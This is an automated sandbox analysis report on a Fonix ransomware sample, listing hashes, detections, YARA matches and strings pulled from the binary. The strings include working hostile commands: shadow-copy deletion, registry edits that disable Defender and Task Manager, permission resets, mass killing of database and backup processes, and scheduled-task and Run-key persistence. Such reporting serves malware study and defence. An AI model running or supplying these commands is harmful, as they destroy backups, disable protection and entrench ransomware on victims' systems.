Analysis Report 8QxrJSmRtc

Overview

General Information

Sample Name: 8QxrJSmRtc (renamed file extension from none to exe)
Analysis ID: 338144
MD5: 6593b7ab157ac82967af0e92efa96134
SHA1: c50e003f5c9ebeebc798b6f00b09aae05518d6cf
SHA256: f8b132d8c750482bd5b6f03bae58f6805fb3480ef0904a21f0111ede5a1ebb1b

Detection

Fonix
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Fonix ransomware
Yara detected Ransomware_Generic
Deletes shadow drive data (may be related to ransomware)
May drop file containing decryption instructions (likely related to ransomware)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 8QxrJSmRtc.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: 8QxrJSmRtc.exe Virustotal: Detection: 41%
Source: 8QxrJSmRtc.exe ReversingLabs: Detection: 58%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01408900 CryptReleaseContext,_Init_thread_footer, 0_2_01408900
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014081C0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy, 0_2_014081C0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014089F0 CryptGenRandom,CryptReleaseContext, 0_2_014089F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01408330 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext, 0_2_01408330
Source: 8QxrJSmRtc.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: 8QxrJSmRtc.exe
Source: 8QxrJSmRtc.exe String found in binary or memory: https://code.jquery.com/jquery-latest.js
Source: 8QxrJSmRtc.exe String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif
Source: 8QxrJSmRtc.exe String found in binary or memory: https://www.who.int

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Fonix ransomware
Source: Yara match File source: 8QxrJSmRtc.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY
Source: Yara match File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Yara detected Ransomware_Generic
Source: Yara match File source: 8QxrJSmRtc.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY
Source: Yara match File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE
Deletes shadow drive data (may be related to ransomware)
Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
Source: 8QxrJSmRtc.exe Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
May drop file containing decryption instructions (likely related to ransomware)
Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp Binary or memory string: How To Decrypt Files.hta\Help.txt
Source: 8QxrJSmRtc.exe Binary or memory string: How To Decrypt Files.hta\Help.txt

System Summary:

Detected potential crypto function
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0145F914 0_2_0145F914
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01458928 0_2_01458928
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0145F07C 0_2_0145F07C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013BE0E0 0_2_013BE0E0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E30E0 0_2_013E30E0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0146A32C 0_2_0146A32C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01456330 0_2_01456330
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014453D4 0_2_014453D4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01451BDC 0_2_01451BDC
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E1A70 0_2_013E1A70
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0144F2C4 0_2_0144F2C4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013BCAD0 0_2_013BCAD0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0144F548 0_2_0144F548
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013B6D20 0_2_013B6D20
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E4D00 0_2_013E4D00
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013C5D40 0_2_013C5D40
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E4580 0_2_013E4580
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014094C0 0_2_014094C0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0145DCC4 0_2_0145DCC4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013B84A0 0_2_013B84A0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013B13F0 0_2_013B13F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013B5CD0 0_2_013B5CD0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013E2700 0_2_013E2700
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_013C0F80 0_2_013C0F80
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_0144F7B0 0_2_0144F7B0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014597B8 0_2_014597B8
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014556B4 0_2_014556B4
Source: classification engine Classification label: mal84.rans.evad.winEXE@1/0@0/0
Source: 8QxrJSmRtc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 8QxrJSmRtc.exe Static file information: File size 1266176 > 1048576

Data Obfuscation:

PE file contains sections with non-standard names
Source: 8QxrJSmRtc.exe Static PE information: section name: _RDATA

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01421020 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_01421020

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 8QxrJSmRtc.exe Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST 
MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EXEWINWORD.EXEWORDPAD.EXENOTEPAD.EXEPAINT.EXENOTEPAD++.EXEENDNOTE.EXEVMWAREUSER.EXEVMWARESERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXESANDBOXIEDCOMLAUNCH.EXEPROCMON.EXEREGMON.EXEFILEMON.EXEWIRESHARK.EXENETMON.EXEVMTOOLSD.EXENTOSKRNL.EXESSMS.EXECBSERVICE.EXEHTTPD.EXEJUSCHED.EXEJUCHECK.EXEJAVAW.EXEJAVA.EXEIPTRAY.EXEIPERIUS.EXEFILEZILLA.EXEDATACOLLECTORSVC.EXEEDGETRANSPORT.EXESTORE.EXEACROTRAY.EXEAGENT.EXESAGECSCLIENT.EXEWSUSSERVICE.EXESLACK.EXENODE.EXEW3WP.EXEMYSQL.EXEMSMDSRV.EXEMSDTSSRVR.EXEFDLAUNCHER.EXEFDHOST.EXEREPORTINGS
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: 8QxrJSmRtc.exe Binary or memory string: Output error ::::].FONIXzip filecopy to path \Cpub.keyreg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /Freg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /Fstart cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Qstart cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exitstart up attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /Fcopy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exeXINOF.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /Freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /fflag C:\ProgramData\nonsnonsFlagblack list 
mms.exeschedul2.exeschedhelp.exetib_mounter_monitor.exeSQLIOSIM.EXESqlagent.exesqlmaint.exesqlstubss.execsrss.exesqlceip.exemstsc.exetaskmgr.exesqlservr.exeQBIDPService.exesqlserver.exemsftesql.exesqlagent.exesqlbrowser.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlpplussvc.exeisqlpussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exestream.exethebat.exethebat64.exeThunderbird.exevisio.exewinword.exewordpad.exenotepad.exepaint.exenotepad++.exeendnote.exevmwareuser.exevmwareservice.exevboxservice.exevboxtray.exeSandboxiedcomlaunch.exeprocmon.exeregmon.exefilemon.exewireshark.exenetmon.exevmtoolsd.exentoskrnl.exeSsms.execbService.exehttpd.exejusched.exejucheck.exejavaw.exejava.exeiptray.exeIperius.exeFileZilla.exeDataCollectorSvc.exeEdgeTransport.exestore.exeacrotray.exeagent.exeSageCSClient.exewsusservice.exeslack.exenode.exew3wp.exemysql.exemsmdsrv.exeMsDtsSrvr.exefdlauncher.exefdhost.exeReportingS

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01421FE8 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_01421FE8
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01421FE8 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_01421FE8
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01422D3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_01422D3C
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_014517F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_014517F8

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: EnumSystemLocalesW, 0_2_014691B4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: EnumSystemLocalesW, 0_2_014690E4
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_014695F0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_01468D98
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: try_get_function,GetLocaleInfoW, 0_2_0145D4B0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_014697CC
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: EnumSystemLocalesW, 0_2_0145CEE0
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe Code function: 0_2_01423200 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_01423200
Behavior Graph

Behavior Graph ID: 338144
Sample: 8QxrJSmRtc
Startdate: 11/01/2021
Architecture: WINDOWS
Score: 84
Process started: 8QxrJSmRtc.exe
Signatures shown on graph: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Fonix ransomware; 4 other signatures
No contacted IP infos